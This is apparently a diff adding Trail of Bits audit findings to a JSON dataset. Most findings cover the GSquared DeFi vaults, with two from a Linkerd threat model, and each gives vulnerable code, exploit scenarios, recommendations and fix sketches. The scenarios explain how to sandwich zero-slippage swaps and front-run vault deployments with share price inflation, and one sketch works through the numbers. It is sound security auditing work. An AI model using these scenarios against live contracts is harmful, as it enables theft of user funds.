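/// Illustrative sketch for the slippage floor discussed in this finding:
/// compute a minimum-amount-out from a quote instead of passing zero.
library MinOut {
    uint256 internal constant BPS = 10_000;

    /// @param expectedOut quote for the swap (e.g., from an oracle or TWAP)
    /// @param toleranceBps allowed slippage, e.g., 50 = 0.5%
    function floor(uint256 expectedOut, uint256 toleranceBps)
        internal
        pure
        returns (uint256)
    {
        require(toleranceBps < BPS, "tolerance too large");
        return (expectedOut * (BPS - toleranceBps)) / BPS;
    }
}
```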
Many of the swaps that the ConvexStrategy contract performs have the minimum-amount-out value hardcoded to zero. But a majority of these swaps can be triggered only by a Gelato keeper, which uses a private channel to relay all transactions. Thus, these swaps cannot be sandwiched. However, this is not the case with the ConvexStrategy.withdraw function. The withdraw function will be called by the GVault contract if the GVault does not have enough tokens for a user withdrawal. If the balance is not sufficient, ConvexStrategy.withdraw will be called to retrieve additional assets to complete the withdrawal request. Note that the transaction to withdraw assets from the protocol will be visible in the public mempool (figure 6.1). function withdraw(uint256 _amount) external returns (uint256 withdrawnAssets, uint256 loss) { if (msg.sender != address(VAULT)) revert StrategyErrors.NotVault(); (uint256 assets, uint256 balance, ) = _estimatedTotalAssets(false); // not enough assets to withdraw if (_amount >= assets) { balance += sellAllRewards(); balance += divestAll(false); if (_amount > balance) { loss = _amount - balance; withdrawnAssets = balance; } else { withdrawnAssets = _amount; } } else { // check if there is a loss, and distribute it proportionally // if it exists uint256 debt = VAULT.getStrategyDebt(); if (debt > assets) { loss = ((debt - assets) * _amount) / debt; _amount = _amount - loss; } if (_amount <= balance) { withdrawnAssets = _amount; } else { withdrawnAssets = divest(_amount - balance, false) + balance; if (withdrawnAssets < _amount) { loss += _amount - withdrawnAssets; } else { if (loss > withdrawnAssets - _amount) { loss -= withdrawnAssets - _amount; } else { loss = 0; } } } } ASSET.transfer(msg.sender, withdrawnAssets); return (withdrawnAssets, loss); } Figure 6.1: The withdraw function in ConvexStrategy.sol#L771-812 In the situation where the _amount that needs to be withdrawn is more than or equal to the total number of assets held by the contract, the withdraw function will call sellAllRewards and divestAll with _slippage set to false (see the highlighted portion of figure 6.1). The sellAllRewards function, which will call _sellRewards, sells all the additional reward tokens provided by Convex, its balance of CRV, and its balance of CVX for WETH. All these swaps have a hardcoded value of zero for the minimum-amount-out. Similarly, if _slippage is set to false when calling divestAll, the swap specifies a minimum-amount-out of zero. By specifying zero for all these token swaps, there is no guarantee that the protocol will receive any tokens back from the trade. For example, if one or more of these swaps get sandwiched during a call to withdraw, there is an increased risk of reporting a loss that will directly affect the amount the user is able to withdraw. Exploit Scenario Alice makes a call to withdraw to remove some of her funds from the protocol. Eve notices this call in the public transaction mempool. Knowing that the contract will have to sell some of its rewards, Eve identifies a pure profit opportunity and sandwiches one or more of the swaps performed during the transaction. The strategy now has to report a loss, which results in Alice receiving less than she would have otherwise. 
Recommendations Short term, for _sellRewards, use the same minAmount calculation as in divestAll but replace debt with the contract's balance of a given reward token. This can be applied for all swaps performed in _sellRewards. For divestAll, set _slippage to true instead of false when it is called in withdraw. Long term, document all cases in which front-running may be possible and its implications for the codebase. Additionally, ensure that all users are aware of the risks of front-running and arbitrage when interacting with the GSquared system.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: High" + ] + }, + { + "title": "7. Stop loss primer cannot be deactivated ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", + "body": "The stop loss primer cannot be deactivated because the keeper contract uses the incorrect function to check whether or not the meta pool has become healthy again. The stop loss primer is activated if the meta pool that is being used for yield becomes unhealthy. A meta pool is unhealthy if the price of the 3CRV token deviates from the expected price for a set amount of time. The primer can also be deactivated if, after it has been activated, the price of the token stabilizes back to a healthy value. Deactivating the primer is a critical feature because if the pool becomes healthy again, there is no reason to divest all of the strategy's funds, take potential losses, and start all over again. The GStrategyResolver contract, which is called by a Gelato keeper, will check to identify whether a primer can be deactivated. This is done via the taskStopStopLossPrimer function. The function will attempt to call the GStrategyGuard.endStopLoss function to see whether the primer can be deactivated (figure 7.1). function taskStopStopLossPrimer() external view returns (bool canExec, bytes memory execPayload) { IGStrategyGuard executor = IGStrategyGuard(stopLossExecutor); if (executor.endStopLoss()) { canExec = true; execPayload = abi.encodeWithSelector( executor.stopStopLossPrimer.selector ); } } Figure 7.1: The taskStopStopLossPrimer function in GStrategyResolver.sol#L46-58 However, the GStrategyGuard contract does not have an endStopLoss function. Instead, it has a canEndStopLoss function. Note that the executor variable in taskStopStopLossPrimer is expected to implement the IGStrategyGuard interface, which does have an endStopLoss function. However, the GStrategyGuard contract implements the IGuard interface, which does not have the endStopLoss function. Thus, the call to endStopLoss will simply return, which is equivalent to returning false, and the primer will not be deactivated. Exploit Scenario Due to market conditions, the price of the 3CRV token drops significantly for an extended period of time. This triggers the Gelato keeper to activate the stop loss primer. Soon after, the price of the 3CRV token restabilizes. However, because of the incorrect function call in the taskStopStopLossPrimer function, the primer cannot be deactivated, the stop loss process completes, and all the funds in the strategy must be divested. Recommendations Short term, change the function call from endStopLoss to canEndStopLoss in taskStopStopLossPrimer. Long term, ensure that there are no near-duplicate interfaces for a given contract in the protocol that may lead to an edge case similar to this. 
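A sketch of the corrected resolver wired to a single authoritative interface (names follow the report; bodies are illustrative):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

/// Single authoritative interface for the guard, so the resolver cannot
/// silently call a function the implementation never defines.
interface IGStrategyGuard {
    function canEndStopLoss() external view returns (bool);
    function stopStopLossPrimer() external;
}

/// Illustrative resolver sketch using the corrected call.
contract GStrategyResolverSketch {
    address public immutable stopLossExecutor;

    constructor(address executor) { stopLossExecutor = executor; }

    function taskStopStopLossPrimer()
        external
        view
        returns (bool canExec, bytes memory execPayload)
    {
        IGStrategyGuard executor = IGStrategyGuard(stopLossExecutor);
        if (executor.canEndStopLoss()) { // the corrected call
            canExec = true;
            execPayload =
                abi.encodeWithSelector(executor.stopStopLossPrimer.selector);
        }
    }
}
```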
Additionally, expand the unit test suite to cover additional edge cases and to ensure that the system behaves as expected.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: High" + ] + }, + { + "title": "8. getYieldTokenAmount uses convertToAssets instead of convertToShares ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", + "body": "The getYieldTokenAmount function does not properly convert a 3CRV token amount into a G3CRV token amount, which may allow a user to withdraw more or less than expected or lead to imbalanced tranches after a migration. The expected behavior of the getYieldTokenAmount function is to return the number of G3CRV tokens represented by a given 3CRV amount. For withdrawals, this will determine how many G3CRV tokens should be returned back to the GRouter contract. For migrations, the function is used to figure out how many G3CRV tokens should be allocated to the senior and junior tranches. To convert a given amount of 3CRV to G3CRV, the GVault.convertToShares function should be used. However, the getYieldTokenAmount function uses the GVault.convertToAssets function (figure 8.1). Thus, getYieldTokenAmount takes an amount of 3CRV tokens and treats it as shares in the GVault, instead of assets. function getYieldTokenAmount(uint256 _index, uint256 _amount) internal view returns (uint256) { return getYieldToken(_index).convertToAssets(_amount); } Figure 8.1: The getYieldTokenAmount function in GTranche.sol#L169-175 If the system is profitable, each G3CRV share should be worth more over time. Thus, getYieldTokenAmount will return a value larger than expected because one share is worth more than one asset. This allows a user to withdraw more from the GTranche contract than they should be able to. Additionally, a profitable system will cause the senior tranche to receive more G3CRV tokens than expected during migrations. A similar situation can happen if the system is not profitable. Exploit Scenario Alice deposits $100 worth of USDC into the system. After a certain amount of time, the GSquared protocol becomes profitable and Alice should be able to withdraw $110, making $10 in profit. However, due to the incorrect arithmetic performed in the getYieldTokenAmount function, Alice is able to withdraw $120 of USDC. Recommendations Short term, use convertToShares instead of convertToAssets in getYieldTokenAmount. Long term, expand the unit test suite to cover additional edge cases and to ensure that the system behaves as expected.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Low" + ] + }, + { + "title": "9. convertToShares can be manipulated to block deposits ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", + "body": "An attacker can block operations by using direct token transfers to manipulate convertToShares, which computes the amount of shares to deposit. convertToShares is used in the GVault code to know how many shares correspond to a certain amount of assets: /// @notice Value of asset in shares /// @param _assets amount of asset to convert to shares function convertToShares(uint256 _assets) public view override returns (uint256 shares) { uint256 freeFunds_ = _freeFunds(); // Saves an extra SLOAD if _freeFunds is non-zero. return freeFunds_ == 0 ? 
_assets : (_assets * totalSupply) / freeFunds_; } Figure 9.1: The convertToShares function in GVault.sol This function relies on the _freeFunds function to calculate the amount of shares: /// @notice the number of total assets the GVault has excluding and profits /// and losses function _freeFunds() internal view returns (uint256) { return _totalAssets() - _calculateLockedProfit(); } Figure 9.2: The _freeFunds function in GVault.sol In the simplest case, _calculateLockedProfit() can be assumed to be zero if there is no locked profit. The _totalAssets function is implemented as follows: /// @notice Vault adapters total assets including loose assets and debts /// @dev note that this does not consider estimated gains/losses from the strategies function _totalAssets() private view returns (uint256) { return asset.balanceOf(address(this)) + vaultTotalDebt; } Figure 9.3: The _totalAssets function in GVault.sol However, the fact that _totalAssets has a lower bound determined by asset.balanceOf(address(this)) can be exploited to manipulate the result by \"donating\" assets to the GVault address. Exploit Scenario Alice deploys a new GVault. Eve observes the deployment and quickly transfers an amount of tokens to the GVault address. One of two scenarios can happen: 1. Eve transfers a minimal amount of tokens, forcing a positive amount of freeFunds. This will block any immediate calls to deposit, since it will result in zero shares to be minted. 2. Eve transfers a large amount of tokens, forcing future deposits to be more expensive or resulting in zero shares. Every new deposit can increase the amount of free funds, making the effect more severe. It is important to note that although Alice cannot use the deposit function, she can still call mint to bypass the exploit. Recommendations Short term, use a state variable, assetBalance, to track the total balance of assets in the contract. Avoid using balanceOf, which is prone to manipulation. Long term, expand the unit test suite to cover additional edge cases and to ensure that the system behaves as expected.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Medium" + ] + }, + { + "title": "10. Harvest operation could be blocked if eligibility check on a strategy reverts ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", + "body": "During harvest, if any of the strategies in the queue were to revert, it would prevent the loop from reaching the end of the queue and also block the entire harvest operation. When the harvest function is executed, a loop iterates through each of the strategies in the strategies queue, and the canHarvest() check runs on each strategy to determine if it is eligible for harvesting; if it is, the harvest logic is executed on that strategy. /// @notice Execute strategy harvest function harvest() external { if (msg.sender != keeper) revert GuardErrors.NotKeeper(); uint256 strategiesLength = strategies.length; for (uint256 i; i < strategiesLength; i++) { address strategy = strategies[i]; if (strategy == address(0)) continue; if (IStrategy(strategy).canHarvest()) { if (strategyCheck[strategy].active) { IStrategy(strategy).runHarvest(); try IStrategy(strategy).runHarvest() {} catch Error( ... 
Figure 10.1: The harvest function in GStrategyGuard.sol However, the canHarvest() check on a particular strategy within the loop can revert, because the external calls that canHarvest() makes to check the status of rewards can themselves revert. Since the call to canHarvest() is not inside of a try block, this would prevent the loop from proceeding to the next strategy in the queue (if there is one) and would block the entire harvest operation. Additionally, within the harvest function, the runHarvest function is called twice on a strategy on each iteration of the loop. This could lead to unnecessary waste of gas and possibly undefined behavior. Recommendations Short term, wrap external calls within the loop in try and catch blocks, so that reverts can be handled gracefully without blocking the entire operation. Additionally, ensure that the canHarvest function of a strategy can never revert. Long term, carefully audit operations that consume a large amount of gas, especially those in loops. Additionally, when designing logic loops that make external calls, be mindful as to whether the calls can revert, and wrap them in try and catch blocks when necessary.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Medium" + ] + }, + { + "title": "11. Incorrect rounding direction in GVault ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", + "body": "The minting and withdrawal operations in the GVault use rounding in favor of the user instead of the protocol, giving away a small amount of shares or assets that can accumulate over time. convertToShares is used in the GVault code to know how many shares correspond to a certain amount of assets: /// @notice Value of asset in shares /// @param _assets amount of asset to convert to shares function convertToShares(uint256 _assets) public view override returns (uint256 shares) { uint256 freeFunds_ = _freeFunds(); // Saves an extra SLOAD if _freeFunds is non-zero. return freeFunds_ == 0 ? _assets : (_assets * totalSupply) / freeFunds_; } Figure 11.1: The convertToShares function in GVault.sol This function rounds down, providing slightly fewer shares than expected for some amount of assets. Additionally, convertToAssets is used in the GVault code to know how many assets correspond to a certain amount of shares: /// @notice Value of shares in underlying asset /// @param _shares amount of shares to convert to tokens function convertToAssets(uint256 _shares) public view override returns (uint256 assets) { uint256 _totalSupply = totalSupply; // Saves an extra SLOAD if _totalSupply is non-zero. return _totalSupply == 0 ? _shares : ((_shares * _freeFunds()) / _totalSupply); } Figure 11.2: The convertToAssets function in GVault.sol This function also rounds down, providing slightly fewer assets than expected for some amount of shares. However, the mint function uses previewMint, which uses convertToAssets: function mint(uint256 _shares, address _receiver) external override nonReentrant returns (uint256 assets) { // Check for rounding error in previewMint. 
if ((assets = previewMint(_shares)) == 0) revert Errors.ZeroAssets(); _mint(_receiver, _shares); asset.safeTransferFrom(msg.sender, address(this), assets); emit Deposit(msg.sender, _receiver, assets, _shares); return assets; } Figure 11.3: The mint function in GVault.sol This means that the function favors the user, since they get some fixed amount of shares for a rounded-down amount of assets. In a similar way, the withdraw function uses convertToShares: function withdraw(uint256 _assets, address _receiver, address _owner) external override nonReentrant returns (uint256 shares) { if (_assets == 0) revert Errors.ZeroAssets(); shares = convertToShares(_assets); if (shares > balanceOf[_owner]) revert Errors.InsufficientShares(); if (msg.sender != _owner) { uint256 allowed = allowance[_owner][msg.sender]; // Saves gas for limited approvals. if (allowed != type(uint256).max) allowance[_owner][msg.sender] = allowed - shares; } _assets = beforeWithdraw(_assets, asset); _burn(_owner, shares); asset.safeTransfer(_receiver, _assets); emit Withdraw(msg.sender, _receiver, _owner, _assets, shares); return shares; } Figure 11.4: The withdraw function in GVault.sol This means that the function favors the user, since they get some fixed amount of assets for a rounded-down amount of shares. This issue should also be considered when minting fees, since they should favor the protocol instead of the user or the strategy. Exploit Scenario Alice deploys a new GVault and provides some liquidity. Eve uses mints and withdrawals to slowly drain the liquidity, possibly affecting the internal bookkeeping of the GVault. Recommendations Short term, consider refactoring the GVault code to specify the rounding direction across the codebase in order to keep the error in favor of the protocol rather than the user. Long term, expand the unit test suite to cover additional edge cases and to ensure that the system behaves as expected.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Low" + ] + }, + { + "title": "12. Protocol migration is vulnerable to front-running and a loss of funds ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", + "body": "The migration from the Gro protocol to the GSquared protocol can be front-run by manipulating the share price enough that the protocol loses a large amount of funds. The GMigration contract is responsible for initiating the migration from Gro to GSquared. The GMigration.prepareMigration function will deposit liquidity into the three-pool and then attempt to deposit the 3CRV LP token into the GVault contract in exchange for G3CRV shares (figure 12.1). Note that this migration occurs on a newly deployed GVault contract that holds no assets and has no supply of shares. 
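The prepareMigration code appears in figure 12.1 below. First, a numeric sketch of the first-depositor share price inflation that drives this finding (simplified vault math, not the GVault implementation):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

/// Numeric sketch of first-depositor share price inflation; the vault math
/// here is the standard assets-to-shares formula, simplified for illustration.
contract InflationSketch {
    function sharesFor(
        uint256 depositAssets,
        uint256 totalAssets,
        uint256 totalSupply
    ) public pure returns (uint256) {
        if (totalSupply == 0) return depositAssets;
        return (depositAssets * totalSupply) / totalAssets; // rounds down
    }

    /// Attacker mints 1 wei of shares, then "donates" 1,000e18 tokens directly
    /// to the vault. A victim depositing 999e18 then receives
    /// 999e18 * 1 / (1_000e18 + 1) = 0 shares: the deposit is absorbed.
    function demo() external pure returns (uint256 victimShares) {
        uint256 supplyAfterAttack = 1;              // attacker's 1 wei of shares
        uint256 assetsAfterDonation = 1_000e18 + 1; // donation plus 1 wei
        victimShares = sharesFor(999e18, assetsAfterDonation, supplyAfterAttack);
        // victimShares == 0
    }
}
```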
function prepareMigration(uint256 minAmountThreeCRV) external onlyOwner { if (!IsGTrancheSet) { revert Errors.TrancheNotSet(); } // read senior tranche value before migration seniorTrancheDollarAmount = SeniorTranche(PWRD).totalAssets(); uint256 DAI_BALANCE = ERC20(DAI).balanceOf(address(this)); uint256 USDC_BALANCE = ERC20(USDC).balanceOf(address(this)); uint256 USDT_BALANCE = ERC20(USDT).balanceOf(address(this)); // approve three pool ERC20(DAI).safeApprove(THREE_POOL, DAI_BALANCE); ERC20(USDC).safeApprove(THREE_POOL, USDC_BALANCE); ERC20(USDT).safeApprove(THREE_POOL, USDT_BALANCE); // swap for 3crv IThreePool(THREE_POOL).add_liquidity([DAI_BALANCE, USDC_BALANCE, USDT_BALANCE], minAmountThreeCRV); //check 3crv amount received uint256 depositAmount = ERC20(THREE_POOL_TOKEN).balanceOf(address(this)); // approve 3crv for GVault ERC20(THREE_POOL_TOKEN).safeApprove(address(gVault), depositAmount); // deposit into GVault uint256 shareAmount = gVault.deposit(depositAmount, address(this)); // approve gVaultTokens for gTranche ERC20(address(gVault)).safeApprove(address(gTranche), shareAmount); } Figure 12.1: The prepareMigration function in GMigration.sol#L61-98 However, this prepareMigration function call is vulnerable to a share price inflation attack. As noted in this issue, the end result of the attack is that the shares (G3CRV) that the GMigration contract will receive can redeem only a portion of the assets that were originally deposited by GMigration into the GVault contract. This occurs because the first depositor in the GVault is capable of manipulating the share price significantly, which is compounded by the fact that the deposit function in GVault rounds in favor of the protocol due to a division in convertToShares (see TOB-GRO-11). Exploit Scenario Alice, a GSquared developer, calls prepareMigration to begin the process of migrating funds from Gro to GSquared. Eve notices this transaction in the public mempool, and front-runs it with a small deposit and a large token (3CRV) airdrop. This leads to a significant change in the share price. The prepareMigration call completes, but GMigration is left with a small, insufficient amount of shares because it has suffered from truncation in the convertToShares function. These shares can be redeemed for only a portion of the original deposit. Recommendations Short term, perform the GSquared system deployment and protocol migration using a private relay. This will mitigate the risk of front-running the migration or share price manipulation. Long term, implement the short- and long-term recommendations outlined in TOB-GRO-11. Additionally, implement an ERC4626Router similar to Fei protocol's implementation so that a minimum-amount-out can be specified for deposit, mint, redeem, and withdraw operations. References ERC4626RouterBase.sol ERC4626 share price inflation", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "13. Incorrect slippage calculation performed during strategy investments and divestitures ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", + "body": "The incorrect arithmetic calculation for slippage tolerance during strategy investments and divestitures can lead to an increased rate of failed profit-and-loss (PnL) reports and withdrawals. 
The ConvexStrategy contract is tasked with investing excess funds into a meta pool to obtain yield and divesting those funds from the pool whenever necessary. Investments are done via the invest function, and divestitures for a given amount are done via the divest function. Both functions have the ability to manage the amount of slippage that is allowed during the deposit and withdrawal from the meta pool. For example, in the divest function, the withdrawal will go through only if the amount of 3CRV tokens that will be transferred out from the pool (by burning meta pool tokens) is greater than or equal to the _debt, the amount of 3CRV that needs to be transferred out from the pool, discounted by baseSlippage (figure 13.1). Thus, both sides of the comparison must have units of 3CRV. function divest(uint256 _debt, bool _slippage) internal returns (uint256) { uint256 meta_amount = ICurveMeta(metaPool).calc_token_amount([0, _debt], false); if (_slippage) { uint256 ratio = curveValue(); if ((meta_amount * PERCENTAGE_DECIMAL_FACTOR) / ratio < ((_debt * (PERCENTAGE_DECIMAL_FACTOR - baseSlippage)) / PERCENTAGE_DECIMAL_FACTOR)) { revert StrategyErrors.LTMinAmountExpected(); } } Rewards(rewardContract).withdrawAndUnwrap(meta_amount, false); return ICurveMeta(metaPool).remove_liquidity_one_coin(meta_amount, CRV3_INDEX, ... ); } Figure 13.1: The divest function in ConvexStrategy.sol#L883-905 To calculate the value of a meta pool token (mpLP) in terms of 3CRV, the curveValue function is called (figure 13.2). The units of the return value, ratio, are 3CRV/mpLP. function curveValue() internal view returns (uint256) { uint256 three_pool_vp = ICurve3Pool(CRV_3POOL).get_virtual_price(); uint256 meta_pool_vp = ICurve3Pool(metaPool).get_virtual_price(); return (meta_pool_vp * PERCENTAGE_DECIMAL_FACTOR) / three_pool_vp; } Figure 13.2: The curveValue function in ConvexStrategy.sol#L1170-1174 However, note that in figure 13.1, the meta_amount value, which is the amount of mpLP tokens that need to be burned, is divided by ratio. From a unit perspective, this is multiplying an mpLP amount by a mpLP/3CRV ratio. The resultant units are not 3CRV. Instead, the arithmetic should be meta_amount multiplied by ratio. This would be mpLP times 3CRV/mpLP, which would result in the final units of 3CRV. Assuming 3CRV/mpLP is greater than one, the division instead of multiplication will result in a smaller value, which increases the likelihood that the slippage tolerance is not met. The invest and divest functions are called during PnL reporting and withdrawals. If there is a higher risk for the functions to revert because the slippage tolerance is not met, the likelihood of failed PnL reports and withdrawals also increases. Exploit Scenario Alice wishes to withdraw some funds from the GSquared protocol. She calls GRouter.withdraw with a reasonable minAmount. The GVault contract calls the ConvexStrategy contract to withdraw some funds to meet the necessary withdrawal amount. The strategy attempts to divest the necessary amount of funds. However, due to the incorrect slippage arithmetic, the divest function reverts and Alice's withdrawal is unsuccessful. Recommendations Short term, in divest, multiply meta_amount by ratio. In invest, multiply amount by ratio.
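To make the unit analysis concrete, the following hedged sketch (illustrative Java; the constants are toy values, not on-chain parameters) shows how dividing by ratio produces a spurious revert that multiplying avoids:

// Illustrative only: ratio carries units of 3CRV per mpLP, scaled by the percentage factor.
public class SlippageUnits {
    static final long PERCENTAGE_DECIMAL_FACTOR = 10_000; // 1e4, as in the strategy

    public static void main(String[] args) {
        long metaAmount = 900;  // mpLP to burn (toy value)
        long ratio = 11_000;    // 1.1 * 1e4, i.e., 1 mpLP is worth ~1.1 3CRV (toy value)
        long debt = 990;        // 3CRV owed
        long baseSlippage = 50; // 0.5%

        // Buggy: dividing mpLP by (3CRV/mpLP) does not yield 3CRV.
        long wrong = metaAmount * PERCENTAGE_DECIMAL_FACTOR / ratio; // ~818
        // Fixed: multiplying mpLP by (3CRV/mpLP) yields 3CRV.
        long right = metaAmount * ratio / PERCENTAGE_DECIMAL_FACTOR; // 990

        long minOut = debt * (PERCENTAGE_DECIMAL_FACTOR - baseSlippage) / PERCENTAGE_DECIMAL_FACTOR; // 985
        System.out.println(wrong >= minOut); // false: the comparison reverts spuriously
        System.out.println(right >= minOut); // true: the withdrawal proceeds
    }
}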
Long term, expand the unit test suite to cover additional edge cases and to ensure that the system behaves as expected.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Medium" + ] + }, + { + "title": "14. Potential division by zero in _calcTrancheValue ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", + "body": "Junior tranche withdrawals may fail due to an unexpected division by zero error. One of the key steps performed during junior tranche withdrawals is to identify the dollar value of the tranche tokens that will be burned by calling _calcTrancheValue (figure 14.1). function _calcTrancheValue(bool _tranche, uint256 _amount, uint256 _total) public view returns (uint256) { uint256 factor = getTrancheToken(_tranche).factor(_total); uint256 amount = (_amount * DEFAULT_FACTOR) / factor; if (amount > _total) return _total; return amount; } Figure 14.1: The _calcTrancheValue function in GTranche.sol#L559-568 To calculate the dollar value, the factor function is called to identify how many tokens represent one dollar. The dollar value, amount, is then the token amount provided, _amount, divided by factor. However, an edge case in the factor function will occur if the total supply of tranche tokens (junior or senior) is non-zero while the amount of assets backing those tokens is zero. Practically, this can happen only if the system is exposed to a loss large enough that the assets backing the junior tranche tokens are completely wiped. In this edge case, the factor function returns zero (figure 14.2). The subsequent division by zero in _calcTrancheValue will cause the transaction to revert. function factor(uint256 _totalAssets) public view override returns (uint256) { if (totalSupplyBase() == 0) { return getInitialBase(); } if (_totalAssets > 0) { return totalSupplyBase().mul(BASE).div(_totalAssets); } // This case is totalSupply > 0 && totalAssets == 0, and only occurs on system loss return 0; } Figure 14.2: The factor function in GToken.sol#L525-541 It is important to note that if the system enters a state where there are no assets backing the junior tranche, junior tranche token holders would be unable to withdraw anyway. However, this division by zero should be caught in _calcTrancheValue, and the requisite error code should be thrown. Recommendations Short term, add a check before the division to ensure that factor is greater than zero. If factor is zero, throw a custom error code specifically created for this situation. Long term, expand the unit test suite to cover additional edge cases and to ensure that the system behaves as expected.
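A minimal sketch of the recommended guard follows (illustrative Java mirroring the Solidity control flow; the scale constant and error message are hypothetical):

public class TrancheValueGuard {
    static final long DEFAULT_FACTOR = 10_000; // illustrative scale, not the contract's constant

    static long calcTrancheValue(long amount, long total, long factor) {
        // Guard first: surface a purpose-built error instead of an opaque division-by-zero revert.
        if (factor == 0) throw new ArithmeticException("no assets backing tranche");
        long value = amount * DEFAULT_FACTOR / factor;
        return Math.min(value, total);
    }

    public static void main(String[] args) {
        System.out.println(calcTrancheValue(500, 1_000, 10_000)); // normal case: 500
        calcTrancheValue(500, 1_000, 0); // loss wiped the tranche: throws instead of dividing by zero
    }
}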
", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "15. Token withdrawals from GTranche are sent to the incorrect address ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", + "body": "The GTranche withdrawal function takes in a _recipient address to send the G3CRV shares to, but instead sends those shares to msg.sender (figure 15.1). function withdraw(uint256 _amount, uint256 _index, bool _tranche, address _recipient) external override returns (uint256 yieldTokenAmounts, uint256 calcAmount) { [...] trancheToken.burn(msg.sender, factor, calcAmount); token.transfer(msg.sender, yieldTokenAmounts); [...] emit LogNewWithdrawal(msg.sender, _recipient, _amount, _index, _tranche, yieldTokenAmounts, calcAmount); return (yieldTokenAmounts, calcAmount); } Figure 15.1: The withdraw function in GTranche.sol#L219-259 Since GTranche withdrawals are performed by the GRouter contract on behalf of the user, the msg.sender and _recipient address are the same. However, a direct call to GTranche.withdraw by a user could lead to unexpected consequences. Recommendations Short term, change the destination address to _recipient instead of msg.sender. Long term, increase unit test coverage to include tests directly on GTranche and associated contracts in addition to performing the unit tests through the GRouter contract.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Low" + ] + }, + { + "title": "16. Solidity compiler optimizations can be problematic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", + "body": "The GSquared Protocol contracts have enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed. Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. Security issues due to optimization bugs have occurred in the past. A medium- to high-severity bug in the Yul optimizer was introduced in Solidity version 0.8.13 and was fixed only recently, in Solidity version 0.8.17. Another medium-severity optimization bug, one that caused memory writes in inline assembly blocks to be removed under certain conditions, was patched in Solidity 0.8.15. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe. It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizations causes a security vulnerability in the GSquared Protocol contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "1. Lack of rate-limiting mechanisms in the identity service ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", + "body": "The identity service issues signed certificates to sidecar proxies within Linkerd-integrated infrastructure. When proxies initialize for the first time, they request a certificate from the identity service. However, the identity service lacks sufficient rate-limiting mechanisms, which may make it prone to denial-of-service attacks.
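As a sketch of the kind of control recommended below, a per-pod token bucket might look like the following (illustrative Java; the Linkerd control plane is not written in Java, and the capacity and refill values are placeholders):

import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;

// Illustrative token bucket: each pod identity may burst a few certificate
// requests, then is throttled to a slow steady rate.
public class CertRateLimiter {
    private static final int CAPACITY = 5;            // max burst of CSRs per pod (placeholder)
    private static final double REFILL_PER_SEC = 0.1; // one new token every 10 seconds (placeholder)

    private static final class Bucket { double tokens = CAPACITY; long last = System.nanoTime(); }
    private final Map<String, Bucket> buckets = new ConcurrentHashMap<>();

    public boolean allowCertificateRequest(String podIdentity) {
        Bucket b = buckets.computeIfAbsent(podIdentity, k -> new Bucket());
        synchronized (b) {
            long now = System.nanoTime();
            b.tokens = Math.min(CAPACITY, b.tokens + (now - b.last) / 1e9 * REFILL_PER_SEC);
            b.last = now;
            if (b.tokens < 1) return false; // reject: this pod is requesting certificates too fast
            b.tokens -= 1;
            return true;
        }
    }
}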
Because identity controllers are shared among pods in a cluster, a denial of service of an identity controller may affect the availability of applications across the cluster. Threat Scenario An attacker obtains access to the sidecar proxy in one of the user application namespaces. Due to the lack of rate-limiting mechanisms within the identity service, the proxy can now repeatedly request a newly signed certificate as if it were a proxy sidecar initializing for the first time. Recommendations Short term, add rate-limiting mechanisms to the identity service to prevent a single pod from requesting too many certificates or performing other computationally intensive actions. Long term, ensure that appropriate rate-limiting mechanisms exist throughout the infrastructure to prevent denial-of-service attacks. Where possible, implement stricter access controls to ensure that components cannot interact with APIs more than necessary. Additionally, ensure that the system sufficiently logs events so that an audit trail is available in the event of an attack.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "2. Lack of rate-limiting mechanisms in the destination service ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", + "body": "The destination service contains traffic-routing information for sidecar proxies within Linkerd-integrated infrastructure. However, the destination service lacks sufficient rate-limiting mechanisms, which may make it prone to denial-of-service attacks if a pod repeatedly changes its availability status. Because destination controllers are shared among pods in a cluster, a denial of service of a destination controller may affect the availability of applications across the cluster. Threat Scenario An 